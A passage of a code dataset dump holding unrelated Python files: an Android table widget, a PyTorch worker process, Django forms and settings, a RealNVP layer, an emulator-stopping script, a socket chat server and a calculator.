ScrollView(self._native_activity)\n # add vertical scroll view\n vscroll_view_layout_params = LinearLayout__LayoutParams(\n LinearLayout__LayoutParams.MATCH_PARENT,\n LinearLayout__LayoutParams.MATCH_PARENT,\n )\n vscroll_view_layout_params.gravity = Gravity.TOP\n self.table_layout = TableLayout(MainActivity.singletonThis)\n table_layout_params = TableLayout__Layoutparams(\n TableLayout__Layoutparams.MATCH_PARENT,\n TableLayout__Layoutparams.WRAP_CONTENT,\n )\n # add horizontal scroll view\n hscroll_view = HorizontalScrollView(self._native_activity)\n hscroll_view_layout_params = LinearLayout__LayoutParams(\n LinearLayout__LayoutParams.MATCH_PARENT,\n LinearLayout__LayoutParams.MATCH_PARENT,\n )\n hscroll_view_layout_params.gravity = Gravity.LEFT\n vscroll_view.addView(hscroll_view, hscroll_view_layout_params)\n\n # add table layout to scrollbox\n self.table_layout.setLayoutParams(table_layout_params)\n hscroll_view.addView(self.table_layout)\n # add scroll box to parent layout\n parent.addView(vscroll_view, vscroll_view_layout_params)\n self.native = parent\n if self.interface.data is not None:\n self.change_source(self.interface.data)\n\n def change_source(self, source):\n self.selection = {}\n self.table_layout.removeAllViews()\n if source is not None:\n self.table_layout.addView(self.create_table_header())\n for row_index in range(len(source)):\n table_row = self.create_table_row(row_index)\n self.table_layout.addView(table_row)\n self.table_layout.invalidate()\n\n def clear_selection(self):\n for i in range(self.table_layout.getChildCount()):\n row = self.table_layout.getChildAt(i)\n row.setBackgroundColor(self.color_unselected)\n self.selection = {}\n\n def create_table_header(self):\n table_row = TableRow(MainActivity.singletonThis)\n table_row_params = TableRow__Layoutparams(\n TableRow__Layoutparams.MATCH_PARENT, TableRow__Layoutparams.WRAP_CONTENT\n )\n table_row.setLayoutParams(table_row_params)\n for col_index in range(len(self.interface._accessors)):\n if self.interface._accessors[col_index] == self._deleted_column:\n continue\n text_view = TextView(MainActivity.singletonThis)\n text_view.setText(self.interface.headings[col_index])\n if self._font_impl:\n self._font_impl.apply(\n text_view, text_view.getTextSize(), text_view.getTypeface()\n )\n text_view.setTypeface(\n Typeface.create(\n text_view.getTypeface(),\n text_view.getTypeface().getStyle() | Typeface.BOLD,\n )\n )\n text_view_params = TableRow__Layoutparams(\n TableRow__Layoutparams.MATCH_PARENT, TableRow__Layoutparams.WRAP_CONTENT\n )\n text_view_params.setMargins(10, 5, 10, 5) # left, top, right, bottom\n text_view_params.gravity = Gravity.START\n text_view.setLayoutParams(text_view_params)\n table_row.addView(text_view)\n return table_row\n\n def create_table_row(self, row_index):\n table_row = TableRow(MainActivity.singletonThis)\n table_row_params = TableRow__Layoutparams(\n TableRow__Layoutparams.MATCH_PARENT, TableRow__Layoutparams.WRAP_CONTENT\n )\n table_row.setLayoutParams(table_row_params)\n table_row.setClickable(True)\n table_row.setOnClickListener(TogaOnClickListener(impl=self))\n table_row.setId(row_index)\n for col_index in range(len(self.interface._accessors)):\n if self.interface._accessors[col_index] == self._deleted_column:\n continue\n text_view = TextView(MainActivity.singletonThis)\n text_view.setText(self.get_data_value(row_index, col_index))\n if self._font_impl:\n self._font_impl.apply(\n text_view, text_view.getTextSize(), text_view.getTypeface()\n )\n text_view_params = TableRow__Layoutparams(\n TableRow__Layoutparams.MATCH_PARENT, TableRow__Layoutparams.WRAP_CONTENT\n )\n text_view_params.setMargins(10, 5, 10, 5) # left, top, right, bottom\n text_view_params.gravity = Gravity.START\n text_view.setLayoutParams(text_view_params)\n table_row.addView(text_view)\n return table_row\n\n def get_data_value(self, row_index, col_index):\n if self.interface.data is None or self.interface._accessors is None:\n return None\n row_object = self.interface.data[row_index]\n value = getattr(\n row_object,\n self.interface._accessors[col_index],\n self.interface.missing_value,\n )\n return value\n\n def get_selection(self):\n selection = []\n for row_index in range(len(self.interface.data)):\n if row_index in self.selection:\n selection.append(self.selection[row_index])\n if len(selection) == 0:\n selection = None\n elif not self.interface.multiple_select:\n selection = selection[0]\n return selection\n\n # data listener method\n def insert(self, index, item):\n self.change_source(self.interface.data)\n\n # data listener method\n def clear(self):\n self.change_source(self.interface.data)\n\n def change(self, item):\n self.interface.factory.not_implemented(\"Table.change()\")\n\n # data listener method\n def remove(self, item, index):\n self.change_source(self.interface.data)\n\n def scroll_to_row(self, row):\n pass\n\n def set_on_select(self, handler):\n pass\n\n def set_on_double_click(self, handler):\n self.interface.factory.not_implemented(\"Table.set_on_double_click()\")\n\n def add_column(self, heading, accessor):\n self.change_source(self.interface.data)\n\n def remove_column(self, accessor):\n self._deleted_column = accessor\n self.change_source(self.interface.data)\n self._deleted_column = None\n\n def set_font(self, font):\n self._font_impl = font._impl\n if self.interface.data is not None:\n self.change_source(self.interface.data)\n\n def rehint(self):\n self.native.measure(\n View__MeasureSpec.UNSPECIFIED,\n View__MeasureSpec.UNSPECIFIED,\n )\n self.interface.intrinsic.width = at_least(self.native.getMeasuredWidth())\n self.interface.intrinsic.height = at_least(self.native.getMeasuredHeight())\n","sub_path":"android/src/toga_android/widgets/table.py","file_name":"table.py","file_ext":"py","file_size_in_byte":9190,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"252781670","text":"import asyncio\nimport multiprocessing\nfrom .util import deepcopy_model, timeit_recorder, TensorsSynchronizer, SingleThreadExecutor\nfrom .ps_config import WorkerMode, Config\nfrom .import_util import libtorch_embedding\nimport torch\nimport itertools\nfrom functools import lru_cache\nimport os\nimport signal\n\n\n@timeit_recorder.timeit('Worker[sync_grad_parameter_names]')\n@lru_cache(maxsize=None)\ndef sync_grad_parameter_names(parameter_names, model):\n cur_param_names = [name for name, p in model.named_parameters() if p.grad is not None]\n if parameter_names != cur_param_names:\n while parameter_names:\n parameter_names.pop()\n if not parameter_names:\n parameter_names.extend(cur_param_names)\n\n\ndef calc_process(model, sync_model, loss, forward_synchronizer, backward_synchronizer, targets_synchronizer, loss_synchronizer,\n prediction_synchronizer, rank, parameter_names):\n setattr(model, 'forward', model.sync_forward)\n\n def sync_handle(*args, **kwargs):\n \"\"\"\n This signal handle calls before forward_sync.send method. Hence, we won't start processing minibatch until\n model synchronization finishes\n \"\"\"\n model.load_state_dict(sync_model.state_dict())\n\n signal.signal(signal.SIGUSR2, sync_handle)\n\n # disable threads in synchronizers because we already work in separate process\n for x in (forward_synchronizer, backward_synchronizer, targets_synchronizer, loss_synchronizer, prediction_synchronizer):\n x.threaded = False\n\n try:\n while True:\n async_tensors, y = forward_synchronizer.recv_nowait(), targets_synchronizer.recv_nowait()\n model.zero_grad()\n async_tensors = (async_tensors, ) if not isinstance(async_tensors, tuple) else async_tensors\n for t in async_tensors:\n t.requires_grad = True\n if t.grad is not None:\n t.grad.zero_()\n if Config.worker_mode == WorkerMode.TRAIN:\n predictions = model(*async_tensors).squeeze()\n output = loss(predictions, y)\n output.backward()\n\n partial_gradients = [p.grad for p in itertools.chain(model.parameters(), async_tensors) if p.grad is not None]\n sync_grad_parameter_names(parameter_names, model)\n\n backward_synchronizer.send_nowait(*partial_gradients)\n loss_synchronizer.send_nowait(output.data)\n elif Config.worker_mode == WorkerMode.EVALUATE:\n with torch.no_grad():\n predictions = model(*async_tensors).squeeze()\n output = loss(predictions, y)\n prediction_synchronizer.send(predictions)\n loss_synchronizer.send(output.data)\n else:\n raise ValueError(\"Unknown worker mode\")\n except:\n import traceback\n print(traceback.format_exc())\n raise\n\n\n@lru_cache(maxsize=None)\ndef pname_index(parameter_names):\n return {pname: i for i, pname in enumerate(parameter_names)}\n\n\n@timeit_recorder.coro_timeit('Worker[match_gradients_to_parameters]')\nasync def match_gradients_to_parameters(parameter_names, model, partial_gradients):\n idx = pname_index(parameter_names)\n for pname, p in model.named_parameters():\n if p.grad is None:\n p.grad = partial_gradients[idx[pname]]\n\n\nclass Worker:\n def __init__(self, sync_model, loss, rank, update_locker, predictions_queue, obj_count, server):\n self.server = server\n self.update_locker = update_locker\n self.predictions_queue = predictions_queue\n self.obj_count = obj_count\n manager = multiprocessing.Manager()\n self.parameter_names = manager.list()\n self.sync_model = sync_model\n self.model = deepcopy_model(sync_model)\n self.model.share_memory()\n self.meta_info = [0]\n self.rank = rank\n\n self.loss = loss\n # forward synchronizer is not threaded since we try to reach zero copy, so it iwll just use additional thread\n # switch overhead instead of speed up on copying\n self.forward_synchronizer = TensorsSynchronizer(threaded=False)\n # this is threaded, because we always do copying there\n self.target_synchronizer = TensorsSynchronizer(threaded=True)\n\n # receiver synchronizers are always non-threaded\n self.backward_synchronizer = TensorsSynchronizer(threaded=False)\n self.loss_synchronizer = TensorsSynchronizer(threaded=False)\n self.predictions_synchronizer = TensorsSynchronizer(threaded=False)\n\n self.proc = multiprocessing.Process(target=calc_process, args=(\n self.model, sync_model, self.loss, self.forward_synchronizer, self.backward_synchronizer, self.target_synchronizer,\n self.loss_synchronizer, self.predictions_synchronizer, rank, self.parameter_names))\n self.proc.start()\n\n self.__backward_gradients = None\n self.__forward_tensors = None\n\n self.forward_executor = SingleThreadExecutor(self.__calc_async_forward)\n self.backward_executor = SingleThreadExecutor(self.__calc_async_backward)\n\n self.loop = asyncio.get_event_loop()\n\n @timeit_recorder.timeit('Worker[async_backward]')\n def __calc_async_backward(self):\n self.model.async_backward(*self.__backward_gradients)\n\n @timeit_recorder.timeit('Worker[async_forward]')\n def __calc_async_forward(self):\n return self.model.async_forward(*self.__forward_tensors)\n\n @timeit_recorder.coro_timeit('Worker[calc_and_send_model]')\n async def _calc_and_send_model(self, batch):\n *X, y = batch\n self.__forward_tensors = X\n async_tensors = await self.loop.run_in_executor(self.forward_executor, lambda: True)\n async_tensors = (async_tensors,) if isinstance(async_tensors, torch.Tensor) else async_tensors\n\n fwd = asyncio.ensure_future(self.forward_synchronizer.coro_send_nowait(*async_tensors))\n tgt = asyncio.ensure_future(self.target_synchronizer.coro_send_nowait(y))\n\n await asyncio.wait([fwd, tgt])\n\n return async_tensors\n\n @timeit_recorder.timeit('Worker[sync_model]')\n def _sync_model(self):\n os.kill(self.proc.pid, signal.SIGUSR2)\n\n @timeit_recorder.coro_timeit('Worker[process_train_minibatch]')\n async def process_train_minibatch(self, rec):\n batch = self.model.parse_train_minibatch(rec)\n batch_size = len(list(batch)[-1])\n self._sync_model()\n\n async_tensors = await self._calc_and_send_model(batch)\n async_tensors = (async_tensors,) if isinstance(async_tensors, torch.Tensor) else async_tensors\n\n bwd = asyncio.ensure_future(self.backward_synchronizer.coro_recv_nowait())\n ls = asyncio.ensure_future(self.loss_synchronizer.coro_recv_nowait())\n\n await asyncio.wait([bwd, ls])\n\n partial_gradients = bwd.result()\n cur_loss = ls.result()\n\n partial_gradients = (partial_gradients,) if not isinstance(partial_gradients, tuple) else partial_gradients\n self.__backward_gradients = partial_gradients[- len(async_tensors):]\n await self.loop.run_in_executor(self.backward_executor, lambda: True)\n await match_gradients_to_parameters(self.parameter_names, self.model,\n partial_gradients[:-len(async_tensors)])\n self.obj_count += batch_size\n return self.clone_model_gradients(), tuple(self.meta_info), float(cur_loss) / batch_size\n\n @timeit_recorder.coro_timeit('Worker[process_train_with_update]')\n async def process_train_with_update(self, batch):\n grad, meta_info, cur_loss = await self.process_train_minibatch(batch)\n await self.server.schedule(grad, meta_info)\n return cur_loss\n\n @timeit_recorder.coro_timeit('Worker[process_evaluation]')\n async def process_evaluation_minibatch(self, rec):\n key, *batch = self.model.parse_evaluation_minibatch(rec)\n batch_size = len(list(batch)[-1])\n await self._calc_and_send_model(batch)\n predictions = await self.predictions_synchronizer.coro_recv()\n cur_loss = await self.loss_synchronizer.coro_recv()\n self.obj_count += batch_size\n return key, libtorch_embedding.clone_tensor(predictions), float(cur_loss) / batch_size\n\n def shutdown(self):\n os.kill(self.proc.pid, signal.SIGINT)\n self.proc.join()\n\n @timeit_recorder.timeit('Worker[clone_gradients]')\n def clone_model_gradients(self):\n return list(libtorch_embedding.clone_tensor(x.grad) if isinstance(x.grad, torch.Tensor) else x.grad\n for x in self.model.parameters())\n","sub_path":"torch_ps/worker.py","file_name":"worker.py","file_ext":"py","file_size_in_byte":8692,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"568940466","text":"from django.forms import ChoiceField\nfrom django.forms import DateField\nfrom django.forms import ModelChoiceField\nfrom django.forms import ModelForm\nfrom django.forms import TimeField\n\nfrom company.models import Employee\nfrom models import Interview\n\n\nclass InterviewForm(ModelForm):\n interview_date = DateField(input_formats=['%m/%d/%Y', ])\n start_time = TimeField(input_formats=['%I:%M%p'])\n end_time = TimeField(input_formats=['%I:%M%p'])\n class Meta:\n model = Interview\n fields = (\n 'case',\n 'category',\n 'interviewer',\n 'interview_date',\n 'start_time',\n 'end_time')\n\n def __init__(self, *args, **kwargs):\n eid = kwargs.pop('eid', '')\n super(InterviewForm, self).__init__(*args, **kwargs)\n if not eid:\n return\n cid = Employee.objects.get(pk=eid).company.id\n if not cid:\n return\n self.fields['interviewer'] = ModelChoiceField(\n queryset=Employee.objects.filter(company=cid, role__name='Interviewer'),\n empty_label=\"Select an interviewer\")\n\n","sub_path":"interview_track/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":1124,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"319413555","text":"\n\nimport pandas as pd\n\ndict_df_output = {}\n\ndf_input = pd.read_csv(\"test\", sep='\\t', dtype=str, engine='python')\nlist_commonMarker = [\"D3S1358\", \"vWA\", \"D16S539\", \"CSF1PO\", \"TPOX\", \"AMEL\",\n \"D8S1179\", \"D21S11\", \"D18S51\", \"DYS391\", \"D2S441\", \"D19S433\", \"TH01\",\n \"FGA\", \"D22S1045\", \"D5S818\", \"D13S317\", \"D7S820\", \"D10S1248\",\n \"D1S1656\", \"D12S391\", \"D2S1338\"]\n\ntest_sample = ['2019-D-1144-01', '2019-D-1155-05']\n\ndf_input['Processed'] = df_input.filter(regex=r'Allele', axis = 1).apply(lambda x : set(x.dropna().values.tolist()),axis=1)\ndf_input = df_input[df_input['Sample Name'].isin(test_sample)][['Sample Name', 'Marker', 'Processed', 'Tag']]\n\n\n\nfor sample in test_sample:\n # df 초기화\n df_temp = pd.DataFrame({}, index = list_commonMarker)\n\n\n df_test = df_input[df_input['Sample Name']==sample]\n tag = df_test['Tag'].unique()\n list_count = []\n for index in range(len(tag)):\n list_count.append([])\n\n\n\n test_gb = df_test.groupby('Marker')\n\n for marker, group in test_gb:\n list_count = []\n list_concat = []\n for each in list(group['Processed']):\n list_count.append([])\n list_concat.extend(each)\n\n union = set.union(*group['Processed'])\n intersection = set.intersection(*group['Processed'])\n\n for member in union:\n count = list_concat.count(member)\n list_count[count-1].append(member)\n\n print(\"list_concat : \")\n print(list_concat)\n print(\"union : \")\n print(union)\n print(\"intersection : \")\n print(intersection)\n print(\"list count : \")\n print(list_count)\n\n df_temp = df_temp.append(pd.DataFrame([[marker, union, intersection, list_count,]], columns=['Marker', 'Union', 'Intersection', 'Count'].extend(tag)))\n\n\n\n\n","sub_path":"CaseReplicateReviewer/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":1870,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"275212779","text":"import numpy as np \nfrom enum import IntEnum\nimport torch\nimport torch.nn as nn\nfrom neuct.models import MultiLayerPerceptron\n\n\nclass CouplingLayer(nn.Module):\n \"\"\"Affine coupling layer in RealNVP.\n\n Args:\n dim (int): Dimension of input.\n mask (torch.tensor): Mask of arrays. \n activations (dict) : List of activation in s,t.\n s_t_net (nn.ModuleDict) : Container of MLP. \n keys ('s','t').\n\n Attributes:\n s_net (MultiLayerPerceptron) : Neural net for scale.\n t_net (MultiLayerPerceptron) : Neural net for translation.\n mask (torch.tensor): Mask of arrays. \n\n \"\"\"\n def __init__(self, dim, mask, s_t_net):\n super(CouplingLayer, self).__init__()\n\n self.s_net = s_t_net['s']\n self.t_net = s_t_net['t']\n self.mask = mask\n self.dtype = mask.dtype\n\n def forward(self, x, sum_logdet_jacobian, reverse):\n if(sum_logdet_jacobian is None):\n device = x.device \n sum_logdet_jacobian = torch.zeros(\n x.size(0),\n dtype=self.dtype, \n device=device,\n requires_grad=True\n )\n b = self.mask.to(x.device)\n x_b = x * b\n s = self.s_net(x_b)\n t = self.t_net(x_b)\n s = s * (1 - b)\n t = t * (1 - b)\n\n if not reverse:\n exp_s = s.exp()\n if torch.isnan(exp_s).any():\n raise RuntimeError('Scale factor has NaN entries')\n x = x * exp_s + t\n sum_logdet_jacobian = sum_logdet_jacobian + s.view(s.size(0), -1).sum(-1)\n else:\n inv_exp_s = s.mul(-1).exp()\n if torch.isnan(inv_exp_s).any():\n raise RuntimeError('Scale factor has NaN entries')\n x = (x - t) * inv_exp_s\n sum_logdet_jacobian = sum_logdet_jacobian - s.view(s.size(0), -1).sum(-1)\n\n return x, sum_logdet_jacobian\n\n","sub_path":"neuct/neuct/flows/real_nvp/coupling_layer.py","file_name":"coupling_layer.py","file_ext":"py","file_size_in_byte":2116,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"580168251","text":"import sys\nimport subprocess\nimport json\nimport telnetlib\nimport time\n\ndef listConnected():\n listConnected = ['adb', 'devices']\n devices = subprocess.Popen(listConnected, stdout=subprocess.PIPE).communicate()[0].decode(\"utf-8\")\n deviceList = devices.split()\n filteredList = list(filter(lambda x : \"emulator\" in x, deviceList))\n return filteredList\n\ndef getName(dev):\n port = str(dev).split('-')[1]\n HOST = 'localhost'\n # AUTH = 'NwhG3frGXDUGGYBz'\n AUTH = '555KjfyUBwIiO+h4'\n tel = telnetlib.Telnet(HOST, port)\n time.sleep(1)\n output = tel.read_very_eager()\n # print(str(output))\n tel.write('auth ' + AUTH + '\\n')\n time.sleep(1)\n tel.write(\"avd name + \\n\")\n time.sleep(1)\n output = tel.read_very_eager()\n # print(str(output))\n\n output = output.split(\"OK\")\n return str(output[1].strip())\n\ninp = sys.argv[1]\n\nwith open(inp) as f:\n jsonList = json.loads(f.read())\n\nnameList = []\n\nfor device in jsonList:\n nameList.append(device['name'])\n\ndevices = listConnected()\n\nif (len(devices) == 0):\n exit()\n\n\nfor dev in devices:\n stop = ['adb', '-s', str(dev), 'emu', 'kill']\n devName = getName(dev)\n if (devName in nameList):\n subprocess.Popen(stop).communicate()\n\n","sub_path":"stop.py","file_name":"stop.py","file_ext":"py","file_size_in_byte":1241,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"597059958","text":"# -*- coding: utf-8 -*-\n# Django settings for skeleton project.\n\nfrom thepian.conf import structure\nfrom os.path import join\n\nDEVELOPING = structure.DEVELOPING\nDEBUG = DEVELOPING\nTEMPLATE_DEBUG = DEBUG\n\n# Possible choices are: ''|'simple'|'recaptcha'\n# To utilize recaptcha you must get public/private keys\n# from http://recaptcha.net/\nCAPTCHA='simple'\nRECAPTCHA_PUBLIC_KEY = ''\nRECAPTCHA_PRIVATE_KEY =''\n\nADMINS = structure.ADMINS\nMANAGERS = ADMINS\n\nif DEVELOPING: \n DATABASE_ENGINE = 'sqlite3'\n DATABASE_NAME = join(structure.PROJECT_DIR,'testdb')\n DATABASE_USER = ''\n DATABASE_PASSWORD = ''\n DATABASE_HOST = ''\n DATABASE_PORT = ''\nelse:\n DATABASE_ENGINE = 'postgresql_psycopg2'\n DATABASE_NAME = 'skeleton'\n DATABASE_USER = 'skeleton'\n DATABASE_PASSWORD = 'thepian'\n DATABASE_HOST = ''\n DATABASE_PORT = '' \n\n# Local time zone for this installation. Choices can be found here:\n# http://en.wikipedia.org/wiki/List_of_tz_zones_by_name\n# although not all choices may be available on all operating systems.\n# If running in a Windows environment this must be set to the same as your\n# system time zone.\nTIME_ZONE = 'Europe/London'\n\n# Language code for this installation. All choices can be found here:\n# http://www.i18nguy.com/unicode/language-identifiers.html\nLANGUAGE_CODE = 'en-uk'\n\nSITE_ID = 1\nSITE_TITLE = 'skeleton Site'\n\n# If you set this to False, Django will make some optimizations so as not\n# to load the internationalization machinery.\nUSE_I18N = True\n\n# Absolute path to the directory that holds media.\n# Example: \"/home/media/media.lawrence.com/\"\nMEDIA_ROOT = ''\n\n# URL that handles the media served from MEDIA_ROOT. Make sure to use a\n# trailing slash if there is a path component (optional in other cases).\n# Examples: \"http://media.lawrence.com\", \"http://example.com/media/\"\nMEDIA_URL = 'http://media.skeleton.com'\n\n# URL prefix for admin media -- CSS, JavaScript and images. Make sure to use a\n# trailing slash.\nADMIN_MEDIA_PREFIX = MEDIA_URL+'/admin/'\n\n# Make this unique, and don't share it with anybody.\nSECRET_KEY = ''\n\n# List of callables that know how to import templates from various sources.\nTEMPLATE_LOADERS = (\n 'django.template.loaders.filesystem.load_template_source',\n 'django.template.loaders.app_directories.load_template_source',\n)\n\nTEMPLATE_CONTEXT_PROCESSORS = (\n \"django.core.context_processors.auth\",\n \"django.core.context_processors.debug\",\n \"django.core.context_processors.i18n\",\n \"django.core.context_processors.media\",\n \n #\"notification.context_processors.notification\",\n #\"announcements.context_processors.site_wide_announcements\",\n #\"messages.context_processors.inbox\",\n \"theapps.supervisor.context_processors.vars\",\n)\n\n#AUTHENTICATION_BACKENDS = (\n# 'django.contrib.auth.backends.ModelBackend',\n# 'accounts.backends.CommentApprovingBackend',\n# 'accounts.backends.EmailBackend',\n# 'openidconsumer.backend.OpenidBackend',\n#)\n\n\nMIDDLEWARE_CLASSES = (\n 'django.middleware.common.CommonMiddleware',\n 'theapps.supervisor.middleware.SiteMiddleware',\n 'django.contrib.sessions.middleware.SessionMiddleware',\n 'django.middleware.locale.LocaleMiddleware',\n 'django.contrib.auth.middleware.AuthenticationMiddleware',\n #'django_openidconsumer.middleware.OpenIDMiddleware',\n 'theapps.supervisor.middleware.DeviceMiddleware',\n)\n\nROOT_URLCONF = 'urls' \n#URLCONFS = {\n# 'www':'conf.urls',\n# 'media':'devonly.media_urls',\n# #TODO 'aa':'theapps.assets.shard_urls',\n#} \n\nAPPEND_SLASH = True\n\nTEMPLATE_DIRS = (\n # Put strings here, like \"/home/html/django_templates\" or \"C:/www/django/templates\".\n # Always use forward slashes, even on Windows.\n # Don't forget to use absolute paths, not relative paths.\n structure.TEMPLATES_DIR,\n # structure.SAMPLE_TEMPLATES_DIR,\n)\n\nINSTALLED_APPS = (\n 'django.contrib.auth',\n 'django.contrib.contenttypes',\n 'django.contrib.sessions',\n 'django.contrib.admin',\n 'django.contrib.admindocs',\n 'django.contrib.humanize',\n 'django.contrib.markup',\n \n 'theapps.about',\n 'theapps.samples',\n 'theapps.media',\n 'theapps.sitemaps',\n \n #'notification',\n 'extensions',\n #'friends',\n 'mailer',\n #'messages',\n #'announcements',\n 'django_openid',\n 'oembed',\n #'gravatar', # This needs to go before threadedcomments.\n 'threadedcomments',\n 'timezones',\n 'feedutil',\n \n 'django_evolution',\n 'theapps.tagging',\n 'theapps.blog',\n \n 'about',\n 'theapps.account',\n # openidconsumer openidserver recapcha debug\n)\n\n#TODO fox this with proper url /account/profile ?\nABSOLUTE_URL_OVERRIDES = {\n \"auth.user\": lambda o: \"/users/%s/\" % o.username,\n}\n\n# AUTH_USER_MODULE = 'account.user_model.User'\n# AUTH_PROFILE_MODELS = ('account.Profile',)\n# AUTH_PROFILE_MODULE = 'account.Profile'\n\nEMAIL_HOST = 'localhost'\nSERVER_EMAIL = \"server@thepia.net\"\n\nDEFAULT_FROM_EMAIL = 'confirmations@skeleton.com'\n\nEMAIL_CONFIRMATION_DAYS = 2\nEMAIL_DEBUG = DEBUG\nCONTACT_EMAIL = \"feedback@skeleton.com\"\nLOGIN_URL = \"/account/login\"\n\nLOGGING_OUTPUT_ENABLED = True\nLOGGING_SHOW_METRICS = True\nLOGGING_LOG_SQL = True\n\nINTERNAL_IPS = ( '127.0.0.1', ) + structure.DEV_MACHINES\n\nDEFAULT_CHARSET = 'utf-8'\n\n# Record page generation statistics and put spread, then pull on demand, flagging page with identifier\nTRACE = DEBUG\n\nugettext = lambda s: s\nLANGUAGES = (\n ('en', u'English'),\n ('de', u'Deutsch'),\n ('es', u'Español'),\n ('fr', u'Français'),\n ('sv', u'Svenska'),\n ('pt-br', u'Português brasileiro'),\n)\n\n# URCHIN_ID = \"ua-...\"\n\nCACHE_BACKEND = \"locmem:///?max_entries=3000\"\nFEEDUTIL_SUMMARY_LEN = 60*7 # 7 hours\n\ntry:\n from localsettings import *\nexcept ImportError:\n pass\n\n\n\n\n","sub_path":"conf/settings.py","file_name":"settings.py","file_ext":"py","file_size_in_byte":5734,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"565788976","text":"from django.contrib.auth import get_user_model\nfrom django.contrib.auth.models import Group\nfrom django.contrib.auth.models import Permission\nfrom django.db import IntegrityError\nfrom django.db import models\nfrom django.db.models import Q\n\n\ndef add_group_permissions(group_id, codenames):\n \"\"\"\n Add permissions to a group\n\n :param group_id: group to add permissions to\n :param codenames: sequence of permission codenames (assumed permission already exists)\n :param allow_duplicates: Whether to throw an error if duplicate permissions assigned (defaults to false)\n :return:\n \"\"\"\n group = Group.objects.get(pk=group_id)\n\n permissions = list(Permission.objects.filter(codename__in=codenames))\n\n # Check that the permissions actually exist\n missing = set(codenames) - set(p.codename for p in permissions)\n if len(missing):\n raise Permission.DoesNotExist(list(missing)[0])\n\n group.permissions.add(*permissions)\n\n\ndef get_users_with_permission(permission):\n return get_users_with_permissions((permission,))\n\n\ndef get_users_with_permissions(permissions):\n \"\"\"\n Assumes authtools is the user model, grabs all users with specified static permissions\n :param permissions: permissions codenames to check\n :return: queryset of users with any of the listed permissions (via a group or directly)\n \"\"\"\n query = Q(False)\n for permission in permissions:\n (app_label, codename) = permission.split('.', 1)\n query = query | Q(codename=codename, app_label=app_label)\n permissions = Permission.objects.filter(Q).values('pk')\n User = get_user_model()\n users = User.objects.filter(\n Q(user_permissions__pk__in=permissions) |\n Q(user__groups__permissions__pk__in=permissions)\n ).distinct()\n return users\n\n\ndef combine_querysets_as_manager(*queryset_classes):\n \"\"\"\n Replacement for django_permanent.managers.MultiPassThroughManager which no longer works in django 1.8\n\n Returns a new Manager instance that passes through calls to multiple underlying queryset_classes via inheritance\n\n :param queryset_classes: Queryset cla\n :return: class\n \"\"\"\n name = \"\".join([cls.__name__ for cls in queryset_classes])\n return type(name, queryset_classes, {}).as_manager()\n\n\nclass NoDeleteQuerySet(models.QuerySet):\n def delete(self, force=False):\n if force:\n return super(NoDeleteQuerySet, self).delete()\n raise IntegrityError(\"Instances of model '%s' are marked as undeletable\" % self.__class__.__name__)\n\n\nclass NoDeleteModel(models.Model):\n \"\"\"\n A model that cannot be deleted.\n\n Note that this is an abstract Model, please read\n https://docs.djangoproject.com/en/1.8/topics/db/managers/#custom-managers-and-model-inheritance\n\n If you wish to override the default manager, you need to combine the queryset like so:\n\n class MyModel(NoDeleteModel):\n objects = combine_querysets_as_manager(NoDeleteQuerySet, MyQuerySet)\n\n If you do not do this then individual record deletions will be blocked, but not deletions via a queryset\n \"\"\"\n objects = models.Manager.from_queryset(NoDeleteQuerySet)\n\n def delete(self, *args, **kwargs):\n if kwargs.get('force'):\n return super(NoDeleteModel, self).delete(*args, **kwargs)\n raise IntegrityError(\"Instances of model '%s' are marked as undeletable\" % self.__class__.__name__)\n\n class Meta:\n abstract = True\n","sub_path":"nac/allianceutils/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":3440,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"106657082","text":"\"\"\"\n@Project :20180813\n@Time :2018/8/13 9:20\n@Author :Zhenxian\n@File :server_.py\n@Software :PyCharm\n\"\"\"\n\nimport socket\n\nsk = socket.socket()\nsk.bind(('127.0.0.1', 65534))\nsk.listen()\ncon, add = sk.accept()\n\nwhile 1:\n msg = con.recv(1024).decode('utf-8')\n print(msg)\n if msg == 'q':\n break\n msg = input('>>>')\n con.send(msg.encode('utf-8'))\n if msg == 'q':\n break\n\ncon.close()\nsk.close()\n","sub_path":"20180813/server_.py","file_name":"server_.py","file_ext":"py","file_size_in_byte":440,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"419185748","text":"\"\"\"\nCalculator from codereview ( cleaning it )\nhttps://codereview.stackexchange.com/questions/31286/py\nthon-calculator-script?newreg=a64e20a154d54122a704bc5e22ad9dfa\n\n\"\"\"\n\ntheList = [\"add\",\"multiply\",\n \"divide\",\"subtract\"]\n\ndef getNumbers():\n global x\n global y\n while True:\n try:\n x = int(input(\"First number: \"))\n break\n except ValueError:\n print(\"Make sure to enter a number.\")\n while True:\n try:\n y = int(input(\"Second number: \"))\n break\n except ValueError:\n print(\"Make sure to enter a number...\")\n\nwhile True:\n operation = input(\"What would you like to do? Multiply/Divide\" +\n \"/Add/Subtract \")\n if operation.lower() in theList:\n break\n else:\n print(\"That was not an option..\")\n\nif operation.lower() == \"multiply\": # If operation is equal to \"multiply\"\n getNumbers()\n z = x * y\n print(z)\nelif operation.lower() == \"subtract\": # If operation is equal to \"substract\"\n getNumbers()\n z = x - y\n print(z)\nelif operation.lower() == \"add\": # If operation is equal to \"add\"\n getNumbers()\n z = x + y\n print(z)\nelif operation.lower() == \"divide\": # If operation is equal to \"divide\"\n getNumbers()\n z = x / y\n print(z)\n\n","sub_path":"DAY11/calCleaned.py","file_name":"calCleaned.py","file_ext":"py","file_size_in_byte":1302,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"269549905","text":"import time\n\nline = [((0, 0), (3, 0))]\nscore = [25,0]\n\nrp_lt = [line, score]\n\n\ndef 